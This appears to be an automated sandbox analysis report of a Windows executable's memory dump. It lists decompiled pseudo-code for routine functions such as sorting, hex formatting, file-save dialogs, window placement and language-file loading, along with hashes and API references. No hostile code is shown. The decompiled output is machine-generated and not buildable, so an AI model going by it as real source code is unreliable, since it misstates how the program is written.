                                                                                                                                                      0x0040a4d4
                                                                                                                                                      0x0040a528
                                                                                                                                                      0x0040a528
                                                                                                                                                      0x0040a533
                                                                                                                                                      0x0040a53e
                                                                                                                                                      0x0040a54c
                                                                                                                                                      0x0040a551
                                                                                                                                                      0x0040a554
                                                                                                                                                      0x0040a599
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a59b
                                                                                                                                                      0x0040a556
                                                                                                                                                      0x0040a55c
                                                                                                                                                      0x0040a562
                                                                                                                                                      0x0040a56a
                                                                                                                                                      0x0040a56f
                                                                                                                                                      0x0040a56f
                                                                                                                                                      0x0040a585
                                                                                                                                                      0x0040a591
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a4d6
                                                                                                                                                      0x0040a4d6
                                                                                                                                                      0x0040a4db
                                                                                                                                                      0x0040a4dd
                                                                                                                                                      0x0040a4e2
                                                                                                                                                      0x0040a4e4
                                                                                                                                                      0x0040a4e6
                                                                                                                                                      0x0040a4ec
                                                                                                                                                      0x0040a4ec
                                                                                                                                                      0x0040a4ef
                                                                                                                                                      0x0040a4f2
                                                                                                                                                      0x0040a4fd
                                                                                                                                                      0x0040a4f4
                                                                                                                                                      0x0040a4f9
                                                                                                                                                      0x0040a4f9
                                                                                                                                                      0x0040a502
                                                                                                                                                      0x0040a506
                                                                                                                                                      0x0040a50c
                                                                                                                                                      0x0040a50e
                                                                                                                                                      0x0040a50e
                                                                                                                                                      0x0040a510
                                                                                                                                                      0x0040a510
                                                                                                                                                      0x0040a516
                                                                                                                                                      0x0040a517
                                                                                                                                                      0x0040a517
                                                                                                                                                      0x0040a51c
                                                                                                                                                      0x0040a522
                                                                                                                                                      0x0040a523
                                                                                                                                                      0x0040a523
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a4d6
                                                                                                                                                      0x004052a6
                                                                                                                                                      0x004052b2

                                                                                                                                                      APIs
                                                                                                                                                      • qsort.MSVCRT ref: 0040A591
                                                                                                                                                        • Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                      • Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                      • Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
                                                                                                                                                      • Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                      • Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405E81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040DFD6();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                                                      0x00405e84
                                                                                                                                                      0x00405e87
                                                                                                                                                      0x00405e8b
                                                                                                                                                      0x00405e90
                                                                                                                                                      0x00405e93
                                                                                                                                                      0x00405f05
                                                                                                                                                      0x00405e95
                                                                                                                                                      0x00405e97
                                                                                                                                                      0x00405e99
                                                                                                                                                      0x00405e9e
                                                                                                                                                      0x00405ea0
                                                                                                                                                      0x00405ea3
                                                                                                                                                      0x00405ea3
                                                                                                                                                      0x00405ead
                                                                                                                                                      0x00405eae
                                                                                                                                                      0x00405eaf
                                                                                                                                                      0x00405eb0
                                                                                                                                                      0x00405eb1
                                                                                                                                                      0x00405eba
                                                                                                                                                      0x00405ebb
                                                                                                                                                      0x00405ec3
                                                                                                                                                      0x00405ec5
                                                                                                                                                      0x00405ec6
                                                                                                                                                      0x00405ed4
                                                                                                                                                      0x00405ed6
                                                                                                                                                      0x00405edb
                                                                                                                                                      0x00405ede
                                                                                                                                                      0x00405ee6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405ee8
                                                                                                                                                      0x00405eec
                                                                                                                                                      0x00405eed
                                                                                                                                                      0x00405ef3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405ef3
                                                                                                                                                      0x00405ef5
                                                                                                                                                      0x00405ef5
                                                                                                                                                      0x00405ef8
                                                                                                                                                      0x00405f01
                                                                                                                                                      0x00405f02
                                                                                                                                                      0x00405f09

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                      • Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                      • Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
                                                                                                                                                      • Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                      • Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405DCD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr _v64;
				wchar_t* _v68;
				intOrPtr _v72;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				struct tagOFNA _v96;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				wchar_t* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v80 = _v80 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v72 = _t23;
				_v48 = _a8;
				_v36 = _a12;
				_v92 = _t34;
				_v96 = 0x58;
				_v84 = _a4;
				_v68 = _t38;
				_v64 = 0x104;
				_v44 = 0x80806;
				if(GetSaveFileNameW( &_v96) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v72;
					}
					wcscpy(_t38, _v68);
					return 1;
				}
			}



















                                                                                                                                                      0x00405dcd
                                                                                                                                                      0x00405dcd
                                                                                                                                                      0x00405dcd
                                                                                                                                                      0x00405dd5
                                                                                                                                                      0x00405dd8
                                                                                                                                                      0x00405dda
                                                                                                                                                      0x00405dda
                                                                                                                                                      0x00405ddc
                                                                                                                                                      0x00405de0
                                                                                                                                                      0x00405de4
                                                                                                                                                      0x00405de8
                                                                                                                                                      0x00405dee
                                                                                                                                                      0x00405df4
                                                                                                                                                      0x00405df7
                                                                                                                                                      0x00405e01
                                                                                                                                                      0x00405e08
                                                                                                                                                      0x00405e0b
                                                                                                                                                      0x00405e0e
                                                                                                                                                      0x00405e15
                                                                                                                                                      0x00405e24
                                                                                                                                                      0x00405e42
                                                                                                                                                      0x00405e26
                                                                                                                                                      0x00405e28
                                                                                                                                                      0x00405e2d
                                                                                                                                                      0x00405e2d
                                                                                                                                                      0x00405e33
                                                                                                                                                      0x00405e3e
                                                                                                                                                      0x00405e3e

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileNameSavewcscpy
                                                                                                                                                      • String ID: X
                                                                                                                                                      • API String ID: 3080202770-3081909835
                                                                                                                                                      • Opcode ID: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
                                                                                                                                                      • Instruction ID: 35274199d236effe9a648b535348c56afb13a0cf633c63e6ee0ccd6430c010a7
                                                                                                                                                      • Opcode Fuzzy Hash: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
                                                                                                                                                      • Instruction Fuzzy Hash: D80192B1D106599FDF10DFE9D88479EBBF4FB08319F10842AE815EA284DBB499098F54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040196B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
				intOrPtr _v8;
				void* __ebx;
				intOrPtr _t10;
				void* _t14;
				WINDOWPLACEMENT* _t15;
				void* _t18;
				struct HWND__* _t23;
				intOrPtr* _t24;

				_t24 = __esi;
				_t18 = __eax;
				_t1 = _t24 + 4; // 0x40d794
				_t10 =  *_t1;
				_v8 = _t10;
				if(_t10 == 0) {
					memset(__eax + 0x248, 0, 0x2c);
				} else {
					_t23 =  *(__eax + 0x208);
					if(_t23 != 0) {
						_t15 = __eax + 0x248;
						_t15->length = 0x2c;
						GetWindowPlacement(_t23, _t15);
					}
				}
				_t14 =  *((intOrPtr*)( *_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
				if(_v8 == 0) {
					_t14 = E004019D2(_t18);
				}
				return _t14;
			}











                                                                                                                                                      0x0040196b
                                                                                                                                                      0x00401970
                                                                                                                                                      0x00401972
                                                                                                                                                      0x00401972
                                                                                                                                                      0x00401977
                                                                                                                                                      0x0040197a
                                                                                                                                                      0x004019a7
                                                                                                                                                      0x0040197c
                                                                                                                                                      0x0040197c
                                                                                                                                                      0x00401984
                                                                                                                                                      0x00401986
                                                                                                                                                      0x0040198e
                                                                                                                                                      0x00401994
                                                                                                                                                      0x00401994
                                                                                                                                                      0x00401984
                                                                                                                                                      0x004019c1
                                                                                                                                                      0x004019c8
                                                                                                                                                      0x004019ca
                                                                                                                                                      0x004019ca
                                                                                                                                                      0x004019d1

                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
                                                                                                                                                      • memset.MSVCRT ref: 004019A7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                      • String ID: WinPos
                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                      • Opcode ID: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
                                                                                                                                                      • Instruction ID: 309fedf9ece379f47234066dfb297f1f11f9bdd101b0f57d7b7a510f29a8e9ac
                                                                                                                                                      • Opcode Fuzzy Hash: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
                                                                                                                                                      • Instruction Fuzzy Hash: 3CF062B0610204EFEB54DF55C899FAE33E99F04700F54017AE9099F1D1EBB89D44C769
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00407170, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
				void _v8198;
				short _v8200;
				int _t11;
				int _t16;

				E0040E340(0x2004, __ecx);
				_t16 = 0;
				_v8200 = 0;
				memset( &_v8198, 0, 0x2000);
				do {
					_t11 = LoadStringW(_a4, _t16,  &_v8200, 0x1000);
					if(_t11 > 0) {
						_t11 = E00406E5E(_t16,  &_v8200);
					}
					_t16 = _t16 + 1;
				} while (_t16 <= 0xffff);
				return _t11;
			}







                                                                                                                                                      0x00407178
                                                                                                                                                      0x0040717e
                                                                                                                                                      0x0040718d
                                                                                                                                                      0x00407194
                                                                                                                                                      0x0040719c
                                                                                                                                                      0x004071ac
                                                                                                                                                      0x004071b4
                                                                                                                                                      0x004071be
                                                                                                                                                      0x004071c4
                                                                                                                                                      0x004071c5
                                                                                                                                                      0x004071c6
                                                                                                                                                      0x004071d0

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00407194
                                                                                                                                                      • LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC
                                                                                                                                                        • Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
                                                                                                                                                        • Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$LoadString_itow
                                                                                                                                                      • String ID: ;t@
                                                                                                                                                      • API String ID: 2363904170-3941608961
                                                                                                                                                      • Opcode ID: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
                                                                                                                                                      • Instruction ID: 51c9355171e471fb499396a2aa2e6012e16bb247b54c8a94724daa36fdc5b9b4
                                                                                                                                                      • Opcode Fuzzy Hash: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
                                                                                                                                                      • Instruction Fuzzy Hash: 5BF0A73290032829F724AA56DD4ABDB7B6CDF05754F0000B6BB0CF61D2D634AA50CBEE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004073D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004073D0(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00405800(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                                                      0x004073d0
                                                                                                                                                      0x004073d1
                                                                                                                                                      0x004073d9
                                                                                                                                                      0x004073e3
                                                                                                                                                      0x004073e5
                                                                                                                                                      0x004073e5
                                                                                                                                                      0x004073f6

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                      • wcsrchr.MSVCRT ref: 004073D9
                                                                                                                                                      • wcscat.MSVCRT ref: 004073EF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                      • Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                      • Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
                                                                                                                                                      • Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                      • Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004075A6, Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004075A6(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t33;
				intOrPtr* _t42;

				_t42 = __esi;
				 *__esi = 0x410168;
				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
				_t33 = E00405CF8(0x34c, __esi);
				_push(0x14);
				 *((intOrPtr*)(__esi + 0x33c)) = 0;
				 *((intOrPtr*)(__esi + 0x348)) = 0;
				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 8)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
				return _t42;
			}





                                                                                                                                                      0x004075a6
                                                                                                                                                      0x004075b0
                                                                                                                                                      0x004075b6
                                                                                                                                                      0x004075bc
                                                                                                                                                      0x004075c1
                                                                                                                                                      0x004075c3
                                                                                                                                                      0x004075c9
                                                                                                                                                      0x004075cf
                                                                                                                                                      0x004075d5
                                                                                                                                                      0x004075db
                                                                                                                                                      0x004075e1
                                                                                                                                                      0x004075eb
                                                                                                                                                      0x004075ee
                                                                                                                                                      0x004075f1
                                                                                                                                                      0x004075f7
                                                                                                                                                      0x00407601
                                                                                                                                                      0x0040760f
                                                                                                                                                      0x00407621
                                                                                                                                                      0x00407611
                                                                                                                                                      0x00407611
                                                                                                                                                      0x00407614
                                                                                                                                                      0x00407616
                                                                                                                                                      0x00407619
                                                                                                                                                      0x0040761c
                                                                                                                                                      0x0040761c
                                                                                                                                                      0x00407623
                                                                                                                                                      0x00407625
                                                                                                                                                      0x00407628
                                                                                                                                                      0x00407630
                                                                                                                                                      0x00407642
                                                                                                                                                      0x00407632
                                                                                                                                                      0x00407632
                                                                                                                                                      0x00407635
                                                                                                                                                      0x00407637
                                                                                                                                                      0x0040763a
                                                                                                                                                      0x0040763d
                                                                                                                                                      0x0040763d
                                                                                                                                                      0x00407644
                                                                                                                                                      0x00407646
                                                                                                                                                      0x00407649
                                                                                                                                                      0x00407651
                                                                                                                                                      0x00407663
                                                                                                                                                      0x00407653
                                                                                                                                                      0x00407653
                                                                                                                                                      0x00407656
                                                                                                                                                      0x00407658
                                                                                                                                                      0x0040765b
                                                                                                                                                      0x0040765e
                                                                                                                                                      0x0040765e
                                                                                                                                                      0x00407665
                                                                                                                                                      0x00407667
                                                                                                                                                      0x0040766a
                                                                                                                                                      0x00407672
                                                                                                                                                      0x00407684
                                                                                                                                                      0x00407674
                                                                                                                                                      0x00407674
                                                                                                                                                      0x00407677
                                                                                                                                                      0x00407679
                                                                                                                                                      0x0040767c
                                                                                                                                                      0x0040767f
                                                                                                                                                      0x0040767f
                                                                                                                                                      0x00407687
                                                                                                                                                      0x0040768d

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                      • Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                      • Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
                                                                                                                                                      • Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
                                                                                                                                                      • Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406264, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E0040562D(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                                                      0x0040626f
                                                                                                                                                      0x00406271
                                                                                                                                                      0x00406276
                                                                                                                                                      0x00406279
                                                                                                                                                      0x0040627c
                                                                                                                                                      0x0040627f
                                                                                                                                                      0x00406283
                                                                                                                                                      0x00406286
                                                                                                                                                      0x0040628a
                                                                                                                                                      0x0040628d
                                                                                                                                                      0x00406290
                                                                                                                                                      0x004062a0
                                                                                                                                                      0x00406292
                                                                                                                                                      0x00406294
                                                                                                                                                      0x00406294
                                                                                                                                                      0x004062a6
                                                                                                                                                      0x004062ac
                                                                                                                                                      0x004062b0
                                                                                                                                                      0x004062b3
                                                                                                                                                      0x004062c4
                                                                                                                                                      0x004062b5
                                                                                                                                                      0x004062b7
                                                                                                                                                      0x004062b7
                                                                                                                                                      0x004062db
                                                                                                                                                      0x004062e6
                                                                                                                                                      0x004062f3
                                                                                                                                                      0x004062f6
                                                                                                                                                      0x004062fd
                                                                                                                                                      0x00406303

                                                                                                                                                      APIs
                                                                                                                                                      • wcslen.MSVCRT ref: 00406271
                                                                                                                                                      • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74784E00,?,00000000), ref: 00406294
                                                                                                                                                        • Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
                                                                                                                                                        • Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
                                                                                                                                                        • Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74784E00,?,00000000), ref: 0040566A
                                                                                                                                                      • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74784E00,?,00000000), ref: 004062B7
                                                                                                                                                      • memcpy.MSVCRT ref: 004062DB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
